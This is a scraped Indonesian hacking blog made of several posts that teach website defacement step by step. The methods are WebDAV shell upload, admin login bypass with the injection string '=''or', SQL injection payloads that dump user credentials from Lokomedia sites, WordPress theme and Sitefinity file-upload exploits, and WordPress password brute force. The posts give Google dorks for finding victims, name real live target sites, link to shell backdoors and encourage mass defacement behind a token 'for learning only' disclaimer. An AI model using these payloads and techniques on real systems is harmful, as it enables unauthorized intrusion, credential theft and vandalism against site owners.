Deface Metode Webdav [Shell Upload]

Deface Metode Webdav [Shell Upload]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Metode Webdav [Shell Upload]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Mungkin di sini ada yang gak tau tentang Webdav??? Jika ingin tau tentang webdav baca aja di post post yg lama atau bisa juga DI SINI 

Bahan Bahan :

1. Dork Webdav

inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
inurl:.yn.cn/*.asp

2. Webdav dan Shell Marker [Di Sini]
3. Script Deface [Di Sini]
4. Kesabaran

Step By Step :

1. Dorking Dork di atas menggunakan Gogle/Mozilla atau yg lainnya

2. Buka Webdav Pilih Webdav Kemudian Asp Shell Marker 

3. Click Setting > Load Shell From Pile (Pilih Asp Shell marker yang udah kalian Download tadi) 

Name Of Your Shell. Untuk mengubah nama shell ente tadi 

(Lihat Gambar Supaya Lebih Jelas)

4. Click Add Site > Masukkan target/Web yang akan di Deface 

5. Kemudia Click Serang 

Tinggal akses shellnya di Browsing kalian 

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Metode Webdav [Shell Upload]" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Deface Metode Webdav [Shell Upload]" Dengan URL https://ryangueltoem.blogspot.co.id/
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Deface Dengan Bypass Admin [ TERBARU ]

Deface Dengan Bypass Admin [ TERBARU ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Udah lama gak pernah ngposting artikel lagi :v maklum lagi sibuk dunia nyata, ngurus pacar wkwkwk :v
Disini saya dengan nick GU3LT03M akan memposting tutorial Bypass Admin lengkap dengan dork fresh auto dapet web vuln, kalau ga dapet berarti kurang tamvan :v

Kali ini saya sendiri (Admin) Akan memberikan Deface Dengan Bypass Admin [ TERBARU ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

1. Dork ( Lihat di bawah )
2. Shell Backdoor ( kalau gagal upload extensi .php coba diganti jadi .php.pjpeg atau .php.xxxjpg )
3. Wajah yang tampan :) seperti admin GU3LT03M yang kegantengannya make banget :)
4. Kesabaran :)

Dork :
    inurl:/admin/upload/ "intext"
    inurl:/admin/ "product"
    inurl :/adm/img/ site:com
    inurl:/admin/image/

Dork diatas dorking melalui google images


Oke, langsung saja simak tutorialnya di bawah ini :)

Step By Step :

1. Dorking dork tadi di google images.
Misal saya pakai dork : inurl:/admin/upload/ "academy"

2. Pilih salah satu gambar, lalu pilih "Lihat gambar"

3. Jika sudah buka gambarnya, tinggal masuk ke patch admin ( tempat login )

Nanti akan masuk ke admin login, tinggal masukkan username : '=''or' sama passwordnya : '=''or'

4. Jika vuln, nanti akan masuk ke dashboard admin.

5. Tinggal cari tempat upload'an file atau gambar, lalu upload shell kalian.

6. Jika sudah terupload, tinggal kalian cari shell yang kalian upload tadi, lalu klik kanan pada shell kalian dan pilih open image in new tab.

7. Dan Tarrraaaa.... Shellnya berhasil di akses :) sekarang bebas mau kalian apain aja :) mau upload file aja atau ngemass deface index :v

Dan ini hasil ngeue tadi : www.shrikrishnascientific.in/touched.php :v Tinggal kalian upload aja ke web mirror kesukaan kalian :v

Mohon kepada yang ingin menggunakan live target jangan merusak admin loginnya :) karena masih banyak yang ingin belajar :)

NB : Jika sudah masuk dashboard admin tapi gabisa upload shell, silahkan tambahkan script JSO pada bagian artikel atau tambahin pada bagian title, nanti akan release tutorial Bypass admin JSOverlay.

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Dengan Bypass Admin [ TERBARU ]" Semoga Bisa Bermanfaat!

Anda Sekarang Sedang Membaca Postingan "Deface Dengan Bypass Admin [ TERBARU ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/11/deface-dengan-bypass-admin-terbaru.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Deface SQL Lokomedia Full

Deface SQL Lokomedia Full 

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface SQL Lokomedia Full 

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Baiklah kembali lagi dengan saya Adewa. Kali ini saya akan memberikan tutorial Deface SQL Lokomedia Full

Siapkan dulu alat alat dan bahan

Bahan Bahan

1. Dork = inurl:statis--profil.html

                inurl:statis--profil.html

                inurl:statis--strukturorganisasi.html 

     (Kembangin dorknya biar makin JOS)
2. Exploit 

    Exploit 1.=  'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

     Exploit 2  =  'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+---

3. Shell Backdoor = https://pastebin.com/nC6pWh5a (Punya indoXploit)

4. Script Deface = Di Sini

Step By Step 

1. Dorking dulu dork di atas

2. Jika sudah masukin exploit di atas (Pilih salah satu aja). Jika Vuln akan ada <LI> atau apalah di title web

(Seperti Ini)

3. Tekan CTRL+U di keyboard. Akan ada username dan passwordnya

Catatan= password masih berbentuk md5 

4. Crack Passwordnya Di Sini atau di sini https://hashkiller.co.uk/md5-decrypter.aspx

Crack Seperti Ini 

5. Tinggal cari aja login adminnya 

site/admin

site/administrator

site/redaktur

site/adminweb

site/admin.php

(Use Your Brain)

6. Upload Shell 

Croott deh sepuas kalian

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface SQL Lokomedia Full " Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface SQL Lokomedia Full " Dengan URL https://ryangueltoem.blogspot.co.id/2017/11/deface-sql-lokomedia-full.html

Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Deface Wordpress Theme Theagency 

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Wordpress Theme Theagency

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Baiklah ketemu lagi dengan saya Adewa
kali ini saya akan memberikan tutorial cara deface metode Wordpress Theme Theagency 

Langsung saja 

Bahan Bahan :

1. Dork inurl:/wp-content/themes/theagency 

2. Exploit /wp-content/themes/theagency/includes/uploadify/uploadify.php

3. Csrf https://ghostbin.com/paste/qh7kb

Step by Step

Dorking dork di atas di gogle image seperti ini 

Cari web vuln menggunakan Exploit 

Jika blank berarti Vuln

masukan alamat site ke csrf simpan dengan ekstensi html

Kemudian buka csrf menggunakan gogle. Upload apa yg ingin kalian upload

Done

Sumur http://www.maxteroit.com/

Sekianlah Postingan Dari All Tutor Cyber tentang "Deface Wordpress Theme Theagency" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface Metode Tevolution Plugin Vulnerability" Dengan URL http://ryangueltoem.blogspot.co.id/2017/10/deface-wordpress-theme-theagency.html
Jika Ada Content Yang Berbau Pentest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

ATQITS Admin Panel Bypass

ATQITS Admin Panel Bypass

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan ATQITS Admin Panel Bypass

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

[+]==================================================================

[+] Exploit Title : ATQITS Admin Panel Bypass

[+]

[+] Dork : "ATQITS ALL RIGHT RESERVED."

[+]

[+]==================================================================

[+]

[+] Author : GU3LT03M

[+] Team : Family Attack Cyber

[+] Tested on : Windows XP

[+]

[+]==================================================================

[+]

[+] Admin Panel : http://www.site/adminpannel

[+] Login With User And Pass : '=''or'

[+]

[+]==================================================================

[+]

[+] Demo :

[+] http://umweltindia.com/adminpannel/

[+] http://www.huntermediahouse.com/adminpannel/

[+] http://www.mapleparadise.com/adminpannel/

[+]==================================================================

[+] Sumber : https://cxsecurity.com/issue/WLB-2017090127

[+]==================================================================

Sekianlah Postingan Dari All Tutoc Cyber Tentang "ATQITS Admin Panel Bypass" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "ATQITS Admin Panel Bypass" Dengan URL http://ryangueltoem.blogspot.co.id/2017/09/atqits-admin-panel-bypass.html 

Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Deface Register Pro Taxi Shell Upload

Deface Register Pro Taxi Shell Upload

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Deface Register Pro Taxi Shell Upload

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Bahan Bahan :

-Dork
-SC Deface
-Shell
 "Dan tentu saja Otak"

Step by Step :

1. Langkah pertama Temukan Target anda dengan Dork ini

   inurl:public/user/signup (Kembangin lagi biar dapat yang Vuln)

2. Ciri ciri web Vuln Ialah seperti ini

3. Klik Create An Account. Isi data sebebas anda

4. Jika Sudah Klik Profile. Kemudian Upload Shell Agan

5. Cara Menemukan Shell. Tekan CTRL+U di keyboard
    kemudian cari format apa yg kalian Upload

Mimin: Upload format PHP

6. Jreng Jreng Shell udah terupload Bebas Mau ngapain :D

7. Mimin cuman upload SC Deface AJa

Jangan Lupa Like Nya :)

Sekianlah Postingan Dari All Tutoc Cyber tentang "Deface Register Pro Taxi Shell Upload" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Deface Register Pro Taxi Shell Upload" Dengan URL https://ryangueltoem.blogspot.co.id/2017/08/deface-register-pro-taxi-shell-upload.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^

Pertama

Tutorial WP BruteForce Menggunakan Python WordPress BruteForce

Bahan :

Python => Download

          NB : Download lalu instal Python-nya

Script Python => Download

          NB : Setelah Python Terinstal, copy script python lalu save dengan format .py

Wordlist => Download

Dork : - inurl:wp-login.php
           - Author/admin "text"

Step By Step :

1. Cari dulu site WP yang akan di WP BruteForce menggunakan dork diatas

2. Cari username WP-nya dengan menggunakan tools ada searching google :v Use Your Brain :'v

    cara mudahnya dengan memasukkan username "admin" lalu memasukkan password asal dulu

Jika muncul Notif seperti dibawah ini berarti usernamenya admin

3. Tinggal kita BruteForce Passwordnya

4. Instal Dahulu Python-nya

5. Setelah selesai terinstal, copy script python lalu save dengan format .py

6. Setelah itu download Wordlistnya

7. Semuanya Gabungkan dalam satu folder

8. Buka CMD lalu masuk ke folder dimana kalian menyimpan file python tadi ( cd/folder ) jika suda masuk  ketikan :

    [namafile].py -h http://[situstarget]/wp-login.php -u [username] -P [wordlist].txt

   contoh : python.py -h http://equilibriobrasilia.eco.br/wp-login.php -u equilibriobrasilia -P wordlist.txt

9. Lalu Tekan Enter dan tunggu proses berjalan..

10. Jika Tampilan Seperti ini, berarti kita telah berhasil mendapatkan password wordpress-nya

11. Lalu pergi ke WP Login dan Masukkan Username dan Password yang telah di BruteForce tadi

12. Login Berhasil :'v

      Setelah itu Apa?! Yahh.. Tanam Shell lah cuk :3

Caranya?! contact aja -_- 10 orang bertanya nanti ane buat post :'v 

Oke sekian tutorial ini...

Lanjut Yang Online :'v 

Kedua

Cara WP BruteForce Online

Tools Online => Kesini

Tinggal Pergi ke link itu trus masukkin site target, username sama wordlistnya. Trus tekan Start dan jangan lupa centang "Break If True" dan tunggu Proses selesai :'v

Sekianlah Postingan Dari All Tutoc Cyber tentang "Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce" Dengan URL https://ryangueltoem.blogspot.co.id/2017/08/cara-wp-bruteforce-online-dan.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More

Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]

Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]

Halo teman-teman pengunjung setia All Tutor Cyber. Selamat datang juga buat penunjung baru. Kali ini saya sendiri (Admin) Akan memberikan Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]

Baiklah untuk lebih jelasnya Teman-teman bisa membacanya di bawah ini

Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v

Langsung Saja...

Bahan Bahan :
1. shell aspx => Yang belom punya download disini
   passwordnya : admin

2. Dork : - inurl:"/Sitefinity/login.aspx"
                - "UserControls/Dialogs"
                - "Sitefinity: Login"

3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

4. Dan yang paling Penting => "KESABARAN" :'v


Step By Step :

1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx"

2. Pilih Salah Satu Web Target

    Live Target : http://www.calstart.org/

3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

    Contoh : http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Maka akan Seperti ini

4. Tinggal Kalian Upload shell aspx nya :'v 

    Tekan "select" => Pilih file upload => "upload selected"

5. Kemungkinan Vuln maka Tampilannya akan Seperti ini

6. Tinggal Buka akses shell kalian :'v
     Akses shell => site.target/Files/nameshell.aspx

Terimakasih Atas Kunjungannya :)

Nitip Nick

=> GU3LT03M <=

Sekianlah Postingan Dari All Tutoc Cyber tentang "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Semoga Bisa Bermanfaat!.

Anda Sekarang Sedang Membaca Postingan "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Dengan URL https://ryangueltoem.blogspot.co.id/2017/07/exploit-cms-sitefinity-editor-dialogs.html
Jika Ada Content Yang Berbau Pantest, Postingan Tersebut Hanya Untuk Pembelajaran. Admin Tidak Bertanggung Jawab Jika Terjadi Sesuatu Kepada Anda.

Sekian. Terimakasih

All Tutor Cyber

Read More